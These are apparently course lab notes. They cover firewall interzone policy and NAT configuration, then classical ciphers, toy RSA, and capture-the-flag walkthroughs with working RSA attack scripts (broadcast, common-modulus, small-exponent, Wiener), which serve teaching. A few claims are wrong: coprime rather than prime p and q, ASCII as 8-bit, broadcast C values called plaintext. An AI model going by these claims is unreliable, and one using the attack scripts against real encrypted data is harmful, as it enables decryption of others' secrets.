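I. Network firewall configuration
Exercise 1 - Interzone policy between the DMZ and Untrust zones
- Task: configure a security policy so that PC1 (2.2.2.1) in the untrust zone can access the server1 server in the DMZ zone.
- Final topology diagram
- Commands to run on each device (can be copied and run directly)
- FW1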
```txt
system-view
sysname FW1
interface g0/0/1
ip address 192.16.1.254 24
interface g0/0/2
ip address 2.2.2.254 24
quit
firewall zone dmz
add interface GigabitEthernet 0/0/1
firewall zone untrust
add interface GigabitEthernet 0/0/2
quit
policy interzone untrust dmz inbound
policy 2
policy source 2.2.2.1 mask 32
policy destination 192.16.1.1 mask 32
action permit
quit
quit
```
- Screenshots of the commands being run: Server1, FW1, PC1
- Screenshot of the successful run
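Exercise 2 - Three-zone topology
- Task: configure the firewall's interzone packet-filtering policies so that the network segment PC1 is on can access Client1 while Client1 cannot access PC1's segment, and Client1 is only allowed to access the ICMP and HTTP services of Server1.
- Final topology diagram
- Commands to run on each device (can be copied and run directly)
- FW1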
```txt
system-view
sysname FW1
# Firewall interface configuration
interface GigabitEthernet0/0/1
ip address 192.168.1.254 24
interface GigabitEthernet0/0/2
ip address 172.16.1.254 24
interface GigabitEthernet0/0/3
ip address 10.1.1.254 24
quit
# Add the firewall interfaces to the corresponding security zones
firewall zone trust
add interface GigabitEthernet0/0/1
firewall zone dmz
add interface GigabitEthernet0/0/2
firewall zone untrust
add interface GigabitEthernet0/0/3
quit
# Configure the interzone policies
policy interzone trust untrust outbound
policy 10
policy destination 10.1.1.1 mask 32
policy source 192.168.1.0 mask 24
action permit
quit
policy interzone untrust dmz inbound
policy 1
policy source 10.1.1.1 mask 32
policy destination 172.16.1.1 mask 32
policy service service-set icmp http
action permit
quit
quit
```
- Screenshots of the commands being run: PC1, FW1, Client1, Server1
- Screenshot of the successful run
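An offline model of the two Exercise 2 interzone policies, showing which session-initiating flows they permit and which fall through to a deny. This is an added example, not part of the original exercise or device code. Assumptions: PC1 is given the constructed address 192.168.1.10, the zones carry the default priorities trust 85 / dmz 50 / untrust 5, unmatched interzone traffic is denied, and reply packets of an already permitted session are not modelled.

```python
import ipaddress
from dataclasses import dataclass

# Assumption: default zone priorities. "outbound" means the session is
# initiated from the higher-priority zone towards the lower-priority one.
PRIORITY = {"trust": 85, "dmz": 50, "untrust": 5}

# Zone membership derived from the FW1 interface subnets in Exercise 2.
ZONE_NETS = {
    "trust": ipaddress.ip_network("192.168.1.0/24"),   # GigabitEthernet0/0/1
    "dmz": ipaddress.ip_network("172.16.1.0/24"),      # GigabitEthernet0/0/2
    "untrust": ipaddress.ip_network("10.1.1.0/24"),    # GigabitEthernet0/0/3
}


@dataclass(frozen=True)
class Rule:
    zones: frozenset       # the two zones named in "policy interzone A B"
    direction: str         # "inbound" or "outbound"
    source: ipaddress.IPv4Network
    destination: ipaddress.IPv4Network
    services: frozenset    # empty set means any service
    action: str


def rule(zone_a, zone_b, direction, source, destination, services=(), action="permit"):
    """Build a Rule from the same fields the CLI policy uses."""
    return Rule(frozenset((zone_a, zone_b)), direction,
                ipaddress.ip_network(source), ipaddress.ip_network(destination),
                frozenset(services), action)


RULES = [
    # policy interzone trust untrust outbound / policy 10
    rule("trust", "untrust", "outbound", "192.168.1.0/24", "10.1.1.1/32"),
    # policy interzone untrust dmz inbound / policy 1
    rule("untrust", "dmz", "inbound", "10.1.1.1/32", "172.16.1.1/32",
         services=("icmp", "http")),
]


def zone_of(ip):
    """Return the zone whose interface subnet contains ip."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONE_NETS.items():
        if addr in net:
            return name
    raise ValueError(f"{ip} is not behind any modelled interface")


def evaluate(src, dst, service):
    """Decide what happens to the first packet of a session src -> dst."""
    src_zone, dst_zone = zone_of(src), zone_of(dst)
    if src_zone == dst_zone:
        raise ValueError("intrazone traffic is outside this model")
    direction = "outbound" if PRIORITY[src_zone] > PRIORITY[dst_zone] else "inbound"
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for r in RULES:
        if (r.zones == {src_zone, dst_zone} and r.direction == direction
                and src_ip in r.source and dst_ip in r.destination
                and (not r.services or service in r.services)):
            return r.action
    return "deny"  # assumption: no matching policy means the packet is dropped


if __name__ == "__main__":
    flows = [
        ("192.168.1.10", "10.1.1.1", "icmp"),   # PC1 segment -> Client1
        ("10.1.1.1", "192.168.1.10", "icmp"),   # Client1 -> PC1 segment
        ("10.1.1.1", "172.16.1.1", "http"),     # Client1 -> Server1, allowed service
        ("10.1.1.1", "172.16.1.1", "ftp"),      # Client1 -> Server1, other service
    ]
    for src, dst, svc in flows:
        print(f"{src:>13} -> {dst:<13} {svc:<5} {evaluate(src, dst, svc)}")
```

The Client1 to PC1 flow is denied because no trust/untrust inbound policy exists, which is exactly the one-way access the task asks for.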
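Exercise 3 - Source NAT address translation lab
- Task: to let users on the private 192.168.1.0/24 network access the Internet normally, a source NAT policy must be configured on the NGFW. In addition to the IP address of the public interface, the company has applied to its ISP for 2 more IP addresses (1.1.1.10~1.1.1.11) to be used as public addresses for translating private addresses; after translation, 1.1.1.0/24 must be reachable.
- Final topology diagram
- Commands to run on each device (can be copied and run directly)
- AR2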
```txt
system-view
sysname AR2
interface GigabitEthernet 0/0/0
ip address 192.168.1.254 24
interface GigabitEthernet 0/0/1
ip address 10.10.1.1 24
quit
ip route-static 0.0.0.0 0 10.10.1.2
```
- FW1
```txt
system-view
sysname FW1
interface GigabitEthernet 0/0/1
ip address 10.10.1.2 24
interface GigabitEthernet 0/0/2
ip address 1.1.1.254 24
quit
firewall zone trust
add interface GigabitEthernet0/0/1
firewall zone untrust
add interface GigabitEthernet0/0/2
quit
ip route-static 0.0.0.0 0 1.1.1.1
ip route-static 192.168.1.0 24 10.10.1.1
# Configure the black-hole routes
ip route-static 1.1.1.10 32 NULL0
ip route-static 1.1.1.11 32 NULL0
# Configure the interzone policy
policy interzone trust untrust outbound
policy 1
policy source 192.168.1.0 mask 24
policy destination 1.1.1.0 mask 24
policy destination 2.2.2.0 mask 24
action permit
quit
quit
# Configure source address translation
nat address-group 1 1.1.1.10 1.1.1.11
nat-policy interzone trust untrust outbound
policy 2
action source-nat
policy source 192.168.1.0 mask 24
address-group 1
quit
quit
```
- Router
```txt
system-view
sysname Router
interface GigabitEthernet 0/0/0
ip address 1.1.1.1 24
interface GigabitEthernet 0/0/1
ip address 2.2.2.254 24
quit
ip route-static 0.0.0.0 0 1.1.1.254
```
- Screenshots of the commands being run: AR2, FW1, Router, PC1, PC2, PC4
- Screenshot of the successful run
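Mock exam
- Task:
To let users on the private 192.168.1.0/24 network access the Internet normally, a source NAT policy must be configured on the NGFW.
In addition to the IP address of the public interface, the company has applied to its ISP for 2 more IP addresses (1.1.1.10~1.1.1.11) to be used as public addresses for translating private addresses; after translation, the 1.1.1.0/24 and 2.2.2.0/24 addresses must be reachable.
The network environment is as shown in the figure; Router is the access gateway provided by the ISP.
1. Configure the IP addresses and gateway addresses of the PC office terminals.
2. Configure the router interface addresses and routes
(1) AR1: configure an outbound default route;
(2) Router: configure the interface addresses.
3. Configure the firewall
(1) Configure the interface addresses and assign the security zones;
(2) Configure the routes needed for connectivity:
outbound direction: a default route and black-hole routes;
inbound direction: a specific route.
(3) Configure interzone policy `policy 1` so that addresses in 192.168.1.0/24 in the Trust zone can access the 1.1.1.0/24 and 2.2.2.0/24 addresses in the Untrust zone.
4. Configure NAPT so that intranet users in 192.168.1.0/24 are translated to the public address pool address-group 1 (1.1.1.10~1.1.1.11) when accessing the Internet.
5. Verify: ping 2.2.2.1 from PC1 and PC2, then check the session table on the firewall to see whether source NAT translation succeeded.
- Final topology diagram
- Commands to run on each device (can be copied and run directly)
- AR1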
```txt
system-view
sysname AR1
interface GigabitEthernet 0/0/0
ip address 192.168.1.254 24
interface GigabitEthernet 0/0/1
ip address 10.10.1.1 24
quit
ip route-static 0.0.0.0 0 10.10.1.2
```
- FW
```txt
system-view
sysname FW
interface GigabitEthernet 0/0/1
ip address 10.10.1.2 24
interface GigabitEthernet 0/0/2
ip address 1.1.1.254 24
quit
firewall zone trust
add interface GigabitEthernet0/0/1
firewall zone untrust
add interface GigabitEthernet0/0/2
quit
ip route-static 0.0.0.0 0 1.1.1.1
ip route-static 192.168.1.0 24 10.10.1.1
# Configure the black-hole routes
ip route-static 1.1.1.10 32 NULL0
ip route-static 1.1.1.11 32 NULL0
# Configure the interzone policy
policy interzone trust untrust outbound
policy 1
policy source 192.168.1.0 mask 24
policy destination 1.1.1.0 mask 24
policy destination 2.2.2.0 mask 24
action permit
quit
quit
# Configure source address translation
nat address-group 1 1.1.1.10 1.1.1.11
nat-policy interzone trust untrust outbound
policy 2
action source-nat
policy source 192.168.1.0 mask 24
address-group 1
quit
quit
```
- Router
```txt
system-view
sysname Router
interface GigabitEthernet 0/0/0
ip address 1.1.1.1 24
interface GigabitEthernet 0/0/1
ip address 2.2.2.254 24
quit
ip route-static 0.0.0.0 0 1.1.1.254
```
- Screenshots of the commands being run: AR1, FW, Router, PC1, PC2, PC3
- Screenshot of the successful run
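II. Network security - cryptography
1. Common encodings (brief introduction; see the PPT for details)
- ASCII code
In a computer, all data is represented as binary numbers when it is stored and processed; the ASCII code is the code table that maps 8-bit binary values to 256 characters.
- Morse code
"." represents a short signal and "-" a long signal; "/" or " " is used as the separator.
- Base encodings
The purpose of base encodings is to express every character using a set of common, visible characters.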
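2. Common classical cipher types (brief introduction; see the PPT for details)
- Rail fence cipher:
The key of the rail fence cipher is a single number k, the length of the fence: the plaintext is divided into groups of k characters, and the n-th character of every group is then joined in turn, producing a string with no apparent pattern.
- Caesar cipher:
Every letter of the plaintext is shifted backward (or forward) in the alphabet by a fixed number of positions and replaced, giving the ciphertext.
- Vigenère cipher: (a special Caesar cipher)
The Vigenère cipher is made up of several Caesar ciphers with different shifts. Producing the ciphertext uses the table method. The shifts are determined by the key.
- Cloud shadow cipher:
Also called the 01248 cipher. 0 is used as the separator; once the non-zero digits are split into groups, the digits of each group are added up and the sum is the index (1-26) of an English letter; uppercase letters only.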
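3. Modern cryptography - RSA
- RSA is a typical asymmetric encryption system; the difficulty of breaking it rests on the problem of factoring large integers.
- Encryption
Public key (E, N)
- Decryption
Private key (D, N)
- How E and D are computed
① Prepare two coprime numbers p and q (one point to note up front: the same p and q can yield several (E, D) pairs)
② N = p * q
③ L = lcm(p-1, q-1), where lcm is the least common multiple
④ Find E: it is not unique, so pick any value that satisfies the two conditions below (gcd is the greatest common divisor):
1 < E < L, and gcd(E, L) = 1 (that is, E and L are coprime)
⑤ Find D: once E is fixed, D is unique as well, because only one value can be computed. It has to satisfy two conditions; computing D is more cumbersome and can only be done by enumerating from 2 to L (see the Java program written by the author)
1 < D < L, and E*D mod L = 1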
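⑥ Worked example with concrete numbers
```java
public class RsaDemo {
    public static void main(String[] args) {
        // p and q only need to be coprime
        Integer p = 17;
        Integer q = 19;
        // computed: n = p*q = 323
        Integer n = p * q;
        // L = lcm(p-1, q-1) = lcm(16, 18) = 144
        Integer L = 144;
        // 5 is an arbitrary choice; it only has to satisfy the coprimality condition.
        // (7 would work here too; a different choice gives a different D below)
        Integer E = 5;
        Integer D;
        // The loop yields the pair public key (5), private key (29). Public and private
        // are in fact relative: if the public key were 29, the private key would be 5.
        for (int i = 2; i < 144; i++) {
            D = i;
            if (E * D % L == 1) {
                System.out.println(D);
                break;
            }
        }
        // Suppose the plaintext is 123; then ciphertext = (123 to the power 5) mod 323 = 225.
        // Decryption: plaintext = (225 to the power 29) mod 323 = 123, so the decrypted plaintext is 123.
        // (The author cannot demonstrate this in Java, because the numbers get too large and the calculation goes wrong.)
    }
}
```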
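Steps ② to ⑤ with the numbers from ⑥, worked in Python as an added example (not the author's program). Here D comes from the extended Euclidean algorithm rather than enumeration, and square-and-multiply exponentiation keeps every intermediate value below N squared, so the encrypt/decrypt round trip that overflowed in Java can be checked directly; all function names are illustrative.

```python
from math import gcd


def lcm(a, b):
    """Least common multiple, as used for L in step 3."""
    return a // gcd(a, b) * b


def egcd(a, b):
    """Extended Euclid: return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    old_r, r = a, b
    old_x, x = 1, 0
    old_y, y = 0, 1
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_x, x = x, old_x - q * x
        old_y, y = y, old_y - q * y
    return old_r, old_x, old_y


def private_exponent(e, l):
    """Step 5 without enumeration: the unique D in (1, L) with E*D mod L == 1."""
    g, x, _ = egcd(e, l)
    if g != 1:
        raise ValueError("E and L are not coprime, so no D exists")
    return x % l


def modexp(base, exponent, modulus):
    """Square-and-multiply; intermediate values never exceed modulus**2."""
    result = 1
    base %= modulus
    while exponent:
        if exponent & 1:
            result = result * base % modulus
        base = base * base % modulus
        exponent >>= 1
    return result


def toy_keypair(p, q, e):
    """Return ((E, N), (D, N)) following steps 2 to 5 of the page."""
    n = p * q
    l = lcm(p - 1, q - 1)
    if not 1 < e < l or gcd(e, l) != 1:
        raise ValueError("E must satisfy 1 < E < L and gcd(E, L) == 1")
    return (e, n), (private_exponent(e, l), n)


if __name__ == "__main__":
    public, private = toy_keypair(17, 19, 5)
    ciphertext = modexp(123, *public)
    print("public", public, "private", private)
    print("123 ->", ciphertext, "->", modexp(ciphertext, *private))
    print("with E = 7:", toy_keypair(17, 19, 7))
```

These parameters are for following the arithmetic only; a 9-bit modulus offers no security.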
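4. Cryptography - characteristics of common RSA attacks (for identifying the type of a range challenge)
- RSA broadcast attack: several C (plaintext) and several N
- RSA common-modulus attack: 2 or more E and a single N
- RSA low encryption exponent with a small plaintext: E (public key) is fairly small
- RSA low decryption exponent (also called Wiener's attack): E (public key) is extremely large
5. State Grid Technology College (Tai'an) cyber range challenges (walkthrough)
* Overview of all the challenges
* Caesar cipher (the first item is the challenge, the second the solver program, the third the answer)
- Challenge
A string of the form flag{***} is encrypted to the ciphertext gmcj\x80o|\x84\x86X\xd6; find the plaintext.
```python
a='gmcj\x80o|\x84\x86X\xd6'
b='flag{'
c=''
# Print the offset between ciphertext and the known prefix "flag{"
for i in range(5):
    print(ord(a[i])-ord(b[i]))
# Subtract a running offset that follows the sequence 1, 1, 2, 3, 5, ...
temp1=1
temp2=1
temp3=1
for i in range(len(a)):
    c+=chr(ord(a[i])-temp1)
    temp3=temp2
    temp2=temp1+temp2
    temp1=temp3
print(c)
```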
flag{good!}
* Base encoding
- Challenge:
Nhwit8Y3NUordknZocPMYFRxj2KiaJCsvVZtQ8NXCzTU4ZGCGfkTtqrycGbmadsQTLfmsK2
flag{327a6c4304ad5938eaf0efb6cc3e53dc}
- Solution approach
* RSA broadcast attack
- Challenge
Given e = 13, three moduli n1, n2, n3 and three ciphertexts c1, c2, c3 (the values are the ones assigned in the solver script that follows), find the plaintext m.
```python
#exp
#coding:utf-8
from Crypto.Util.number import long_to_bytes,bytes_to_long
from gmpy2 import invert, iroot

def broadcast(n1, n2 ,n3, c1, c2, c3):
    # Chinese Remainder Theorem: combine c_i mod n_i into one value mod N = n1*n2*n3
    n = [n1, n2, n3]
    C = [c1, c2, c3]
    N = 1
    for i in n:
        N *= i
    Ni = []
    for ni in n:
        Ni.append(N // ni)
    T = []
    for i in range(3):
        T.append(invert(Ni[i], n[i]))
    X = 0
    for i in range(3):
        X += C[i] * Ni[i] * T[i]
    m = X % N
    return m

def main():
    e = 13
    n1=92524936991597191087876963970818192699000837471047570833361814863690117215624182271726144669041983505659467638902416579902938926994684371370584528161658547137504224359103726996826330103457438735550313924659788985151016583670871569078001520895163276682652024979721765888037313024073111969080028401548915584860529087833415360261729733573929336020153998495183047171374610008025906107007868189633396254936451371399512715206524180885726466631961171680737032684040558335907848994165579980698323394324757126691913004750279340397367992376919586081940814067537894461505284800627760042934366651060568756658632559
    n2=47882861583493769792652043915895885711938470011006735368086234918311630735291944884018382340034749356966691872199889087827165231003497124805297898314252131347116985861108032822805283869274755918189419610079937290554651399231597891881104734201327052955612523091262899866624251672392475330631436413697327575811187455580631861926088113872524607626161284142479284858683841270009524277280994923793597438628338107326420845170238602288323355648736295910738442702007217991223982629181446112444553483593640081243492596463130017759009113212441145454676101800987537042692739071914495135292776335690885163386239823
    n3=105121345161568778537500796564275801401688120648445009173256974993138370917194265956191653980821195803457686157829335539012829141165774234357585374787579491811543376426820559128464240217101697871504951848038499315061750224915924576236894677500809983104794816902716120180059054924047804882769032274460760929849651216442149592488466827102265838579767250228595595985281651367536842639511918837429414489458024639144491007786519471599065644854371866037488287093126401150008050984606591522815813056118371138671245796393328811148380957740025982059114031866967745062373001639733954044095500428145039342544316863
    c1=44021578094179205932288298141583959143684018023664861177042691325754443818081769084395526425284909486720278064005104021870779164431277103806967796287490679352306668404569592132266698373208122284552264163546051651872409079297010913580413579444650783707897056758786659608737964832479995896968436467220867962184514688618565540693876233579366577229142298900560553639547522576819353391241452856878889145548736763265869688622430860748392365294208339009676510164941363680546926816583009736795353772131670880911914898624023087011402631179428290830080632860018539213282913972994459264975373437732385771617501637
    c2=19445073906555253525537245829874857990059701639831505552348010486285159596127835263918512553697397476873127356642619496234633582423750907283097479961744699507154761785876909054640469070258906229634558472281655582285098166686817554016788306501605263871435722422254644063131311882876128400550920237748436643513210258820188176528482039434419377375796274744374628283314059522000471608750708748421030848435993883391350222398896915429103628495322429882381312084266081599604608032101884229888851328850487143780426635290589683937293327728914907025978560639685595554270915517277993755511283304326189949765982897
    c3=89991155615199608389965602227251502610230252313158034447374008510409684542002392814878747524489155039338425955744133893962504874964491819169815804880568448244729828000774292853049676484446788711185335159667765003208350967995541408188418810764716808842626467643283794783242721462622492803175198830142984334432322052011230222733236145604638886913445503989451701053752307663530348935590174311775001895650764826399881247640558440586130482610759307610366060500592395382481045472877136782085374872948572290907761673984329777238817152204414479425934681180267452178076205241878700707237400323702289456477071714
    m = broadcast(n1, n2 ,n3, c1, c2, c3)
    # iroot returns (root, is_exact); convert the gmpy2 mpz root to int before encoding
    print(long_to_bytes(int(iroot(m,e)[0])))
    print(m)

if __name__=="__main__":
    main()
```
flag{09a3f8480a4a95478274b23fcec4073b}
* RSA common-modulus attack
- Challenge
Given one modulus n, two public exponents e1 = 3961 and e2 = 39661, and two ciphertexts c1 and c2 (the values are the ones assigned at the top of the solver script that follows), find the plaintext m.
```python
import libnum
import gmpy2

n=4606214404559381625811305893421796457727307893522234545002637928126211269316759285703114898387185124444125403886775937362327115049887275542033614535006266982230728414436881929499120917023099931731154480279878961462890606099680544893518162357543517663448598189398364777700764201628600330674624309734150799327802881199123017672936478453599758403904501509023550075462646307259074918554393814051649454027370323722466596794338785975786762544233089948295159326932530142156693536761290325166663837198648438565756950669154631177080413510965650961179598568656438763915125788387042278733534990706259579644193764771790940175060031403391673835392301230762706826357767139806907288386554701237375970122539874558801064426127357993451875548199398779957689591805731666683159713949539956972421365823968509961851731675821768810158549871866855970380999634262510655193972343386664235281822656401649891282959851508174717635599479503678209534201303747137636130146004985863109286598472225239106174001881488566658746814277408673886092025714672774526054105715514515828695891197567723115621647063617381815989618596582463826784688350794675454728821530564058656768355901167368323058748745770407030433581712448954059916009598250320631
e1=3961
e2=39661
c1=3837499388455120656867996348713152796258019690191969988843127291215462712127620403068753553367088567073867471571201908322320465885943205429972913247041289009706287142724312212436737393236413143994626064490297937530087295750992739586545671144359484383264416324198087122816045177774320769235002566511128670719776095088328298829387614542992594074076230396124614177801908183924912637040706013914289088681433669011388036613446129356409413670671292406747678040705779573864607561270257783753748995854744272261777745636348393124375470191723259093713990560245604156212381175794384987660240632069882683243408009197662876297392776499829139942540170411011193477140582442543447240154732018020414636543952622244587297337516302276577587483341242855629750723299196962652280980029833172306621035030602001489526266471628252411072394649732898826828650082323467831447543341986110050674843712168131578454880285847519984505884537048953401917291988302822640969586523078595398214110577364335572792040908066353542797711044609986818407526276623134883604311196929194845167221887179349308411987286918430402955406174717953513907354499985297123553922220999152076137186010008440300860402391806368607939701458636422792104581468853500339
c2=516144633013811112886792001654989445834450364017535055282084776134066047140744541127402208154454108824957465184368293981255055118766542087965844721575465557839124537125203069445424537449162248750901106984608201441498157229171325843327039518601149565688635319745251796978492834090711540621416140758667450469649514609322384993669552881669681643734184080837236954659699909281354088531456248420524775156766607176790285297650370408663229065136104192025279935464662164797806028666156110000187437655498203412062698329219949262308813700244536928610798624752546494028242097373072925895540589396299985380749410374578133264869591859011242071818144027791627763313385218323524098953707340678077645156833716581370443623533390586314124336677442618178538774474320682299728631032427623000842464650999067403676635741792096149059056559990879456070044148573842587508520690390257812232611111313987359329328645067153673069467853801400328324497262436640915685606632521893541501538305824059283975767319250940633479844145489924915801010604008722966099476172080678828712862231281409246368873360519426922362725054985113908840947023751123519796668861742282682908592604065917742647822853267591956812814541551684160810120141854610728

def exp_def(e1,e2,c1,c2,n):
    # gcdext returns (g, s1, s2) with e1*s1 + e2*s2 == g
    s,s1,s2 = gmpy2.gcdext(e1, e2)
    # c1^s1 * c2^s2 mod n equals m^g mod n; take the g-th root
    m = gmpy2.iroot((pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n,s)[0]
    return int(m)

m=exp_def(e1,e2,c1,c2,n)
print(libnum.n2s(m))
```
flag{gongmogongji!}
* Morse code
- Challenge
-- --- .-. ... . -.-. --- -.. .
flag{MORSECODE}
- Solution approach
* Caesar cipher 3
```txt
table = ['00000', '00001', '00010', '00011', '00100', '00101', '00110', '00111', '01000', '01001', '01010', '01011', '01100', '01101', '01110', '01111', '10000', '10001', '10010', '10011', '10100', '10101', '10110', '10111', '11000', '11001', '11010', '11011']
alphabet = 'abcdefghijklmnopqrstuvwxyz{}'
flag = '************'
c = ''
count=0
for i in flag:
    count=count+1
    print(count)
    c+= table[alphabet.index(i)]
print(c)
# c='0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
```
```python
table = ['00000', '00001', '00010', '00011', '00100', '00101', '00110', '00111', '01000', '01001', '01010', '01011', '01100', '01101', '01110', '01111', '10000', '10001', '10010', '10011', '10100', '10101', '10110', '10111', '11000', '11001', '11010', '11011']
alphabet = 'abcdefghijklmnopqrstuvwxyz{}'
flag = ''
b=[]
c = '0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
for i in range(0,len(c),5):
    print(c[i:i+5])
    flag+=alphabet[table.index(c[i:i+5])]
print(flag)
# c='0010101011000000011011010100110000001000000000110110111010000000001110100001010011011'
```
```txt
flag{taianxiaoqu}
```
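* Caesar cipher 2
- Challenge
The ciphertext is fkcd\x7f_=\\<+<X@ q%s&?!JNL\x16Q\x1bJ\x1cI\x16SGP\x12R>X\x11\x89?ZT and the plaintext has the form flag{***}.
```python
a='fkcd\x7f_=\\<+<X@ q%s&?!JNL\x16Q\x1bJ\x1cI\x16SGP\x12R>X\x11\x89?ZT'
b='flag{'
c=''
# Print the offset between ciphertext and the known prefix "flag{"
for i in range(5):
    print(ord(a[i])-ord(b[i]))
# Even positions were shifted up by i, odd positions down by i; undo both
for i in range(len(a)):
    if i%2==0:
        c+=chr(ord(a[i])-i)
    else:
        c+=chr(ord(a[i])+i)
print(c)
```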
flag{d7c442c4-c4c7-46c6-9407-35f030a46cf2}
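* Vigenère
- Challenge
The ciphertext ``ZbsQc[^i\xe0m_SbnWq_frZainYk`kocb`\x1c\x19x was produced with the Vigenère cipher; the key has 6 positions and the plaintext has the form flag{***}.
```python
a='``ZbsQc[^i\xe0m_SbnWq_frZainYk`kocb`\x1c\x19x'
b='flag{'
c=''
# Vigenère cipher
# The known prefix "flag{" gives the first five key offsets
for i in range(5):
    print(ord(a[i])-ord(b[i]))
key=[-6,-12,-7,-5,-8,-5]
key.append(5)
print(key)
# Only key[0..5] are used, because the index is taken modulo 6
for i in range(len(a)):
    c+=chr(ord(a[i])-key[i%6])
print(c)
```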
flag{Vigenère_is_very_interesting!!}
* Rail fence cipher
- Challenge
A string of the form flag{***} becomes fghai}l{anmazlma after rail fence encryption, where the number of rails is 3.
```python
# _*_ encoding:utf-8 _*_
import math

def buwei(encrypted_str,fence_length):
    # e.g. 14, 4
    str_len = len(encrypted_str)
    fence_count = math.ceil(str_len/ fence_length)  # gives 4
    target_length = fence_count*fence_length
    jiequ = []
    while str_len<target_length:
        encrypted_str = encrypted_str + '*'
        jiequ.append(encrypted_str[-fence_count :])
        encrypted_str = encrypted_str[:-fence_count]
        str_len += 1
    jiequ.reverse()
    s = ''
    for i in jiequ:
        s = s + i
    result = encrypted_str + s
    return result

def decrypt_fence(encrypted_str,fence_length):
    encrypted_str = buwei(encrypted_str,fence_length)
    if fence_length>=len(encrypted_str) or fence_length<1:
        # message: "fence length too large or too small, nothing to decrypt"
        print("栅栏长度太大或者太小,无需解密")
        return
    fence_count = math.ceil(len(encrypted_str)/fence_length)
    elen=len(encrypted_str)
    # b = elen // f  # divide the actual string length by the divisor f computed above
    result = {x: '' for x in range(fence_count)}
    for i in range(elen):  # loop once for every character of the string
        a = i % fence_count
        result.update({a: result[a] + encrypted_str[i]})  # take the character and update the entry
    d = ''
    for i in range(len(result)):
        d += result[i]
    d = d.replace("*", '')
    # message: "assuming {fence_length} characters per rail, the decrypted result is {d}"
    print(f'假设每栏字数为:{fence_length},解密结果为:{d}')  # print the result and move on to the next iteration

for i in range(2,10):
    decrypt_fence('fghai}l{anmazlma', i)
```
flag{zhalanmima}
* Cloud shadow cipher
- Challenge
8842101220480224404014224202480122
```python
a='8842101220480224404014224202480122'
# 0 is the separator between letters
s=a.split('0')
print(s)
l=[]
flag=''
# The digits of each group add up to the letter index (1-26)
for i in range(len(s)):
    total=0
    for j in range(len(s[i])):
        total+=int(s[i][j])
    l.append(total)
print(l)
for i in range(len(l)):
    flag+=chr(ord('A')+l[i]-1)
print(flag)
```
flag{WELLDONE}
* Base64 steganography
- Challenge (the base64 text that the solver reads from stego.txt)
import base64

def get_diff(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            # Subtract the canonical encoding from the stego value to get the hidden data
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return res

def b64_stego_decode():
    with open("stego.txt", "rb") as file:
        lines = file.readlines()
    x = ''  # x is the bit string (bin_str)
    print(len(lines))
    for line in lines:
        l = str(line, encoding="utf-8")
        stego = l.strip()  # drop the trailing '\n' (and '\r' on CRLF files)
        #print(stego)
        realtext = base64.b64decode(l)
        #print(realtext)
        realtext = str(base64.b64encode(realtext), encoding="utf-8")
        #print(realtext)
        diff = get_diff(stego, realtext)  # diff is the numeric difference between the stego string and the canonical string
        n = stego.count('=')
        if diff:
            x += bin(diff)[2:].zfill(n * 2)
        else:
            x += '0' * n * 2

    # Turn the bit string into characters, 8 bits at a time, skipping zero bytes
    i = 0
    flag = ''
    while i < len(x):
        if int(x[i:i+8], 2):
            flag += chr(int(x[i:i+8], 2))
        i += 8
    print(len(flag))
    print(flag)

if __name__ == '__main__':
    b64_stego_decode()
flag{Base_sixty_four_point_five}
* RSA with a low encryption exponent and a small plaintext
- Challenge
n = 1095193501314071508992184356698396498575993903902645176736824248626203423178058582980052056709470835349461883611907327333787476380807006829079149314187911076379180537479205152791331657276201370436693788845669156157605617438343332630668947137747409198034213068554850351851691
e = 3
c = 26957748170151919359681404117038763858559543976167222472065679376272566294346163463362841607862769232841859888042233434558282075299993159865541365966460870384341918224255038862662419746644668349966761257524859531569439368239059072753259426203046522626624370137714579366927
Find the plaintext m.
import libnum
import gmpy2

n = 1095193501314071508992184356698396498575993903902645176736824248626203423178058582980052056709470835349461883611907327333787476380807006829079149314187911076379180537479205152791331657276201370436693788845669156157605617438343332630668947137747409198034213068554850351851691
e = 3
c = 26957748170151919359681404117038763858559543976167222472065679376272566294346163463362841607862769232841859888042233434558282075299993159865541365966460870384341918224255038862662419746644668349966761257524859531569439368239059072753259426203046522626624370137714579366927

def exp(n, e, c):
    # c = m^e mod n, so m^e = c + k*n for some k >= 0; with a small m and e = 3
    # k is small, so try k = 0, 1, 2, ... until c + k*n is a perfect e-th power
    k = 0
    while 1:
        m1 = k * n + c
        m, t = gmpy2.iroot(m1, e)  # t is True when the root is exact
        print(m, t)
        if t:
            print(m)
            print(k)
            print(libnum.n2s(int(m)))
            break
        k += 1

exp(n, e, c)
flag{20d6e2da95dcc1fa5f5432a436c4be18}
* RSA with a low decryption exponent 1
- Challenge
n = 113881698992379349039968368927979997900777221951663104697020683691495129639829918739755194174063944178083527489820939138302751895652076620380510013941997706327553964127612610209509889011613768847759318892303231846117914554931459295347697888260576901354448014917692680573408654658384481284699735788978230690197
e = 39068960413447607023613035707248214114819409621234801785480423979473767995171860917209502861408393208940683687475760366491413173744775811644295874981290403938714121977201901942939425294427737703229098649131737380098596135730392902019429964095866394165971291108245774407908011073271822915371753470010435225545
c = 32897925577913728659288168937025744709859960639901500169867896018406263110205704273203287172003057450591000201857719871686024077615520906540631374442504017489026298422189715372129838501090730593164075113452055617571409044743698645392909829425374093273187125709095368164744188182156849031225036001381531504057
Find the plaintext m.
import gmpy2
import libnum

def continuedFra(x, y):
    """Compute the continued fraction expansion of x / y
    :param x: numerator
    :param y: denominator
    :return: list of continued fraction terms
    """
    cf = []
    while y:
        cf.append(x // y)
        x, y = y, x % y
    return cf

def gradualFra(cf):
    """Compute the last convergent of the given list
    :param cf: list of continued fraction terms
    :return: the last convergent of that list
    """
    numerator = 0
    denominator = 1
    for x in cf[::-1]:
        # The numerator and denominator of the convergent are tracked separately
        numerator, denominator = denominator, x * denominator + numerator
    return numerator, denominator

def solve_pq(a, b, c):
    """Solve for p and q with Vieta's formulas, x^2-(p+q)*x+pq=0
    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: pq
    :return: p, q
    """
    disc = b * b - 4 * a * c
    if disc < 0:
        # A wrong phi candidate can give a negative discriminant; isqrt would raise
        return 0, 0
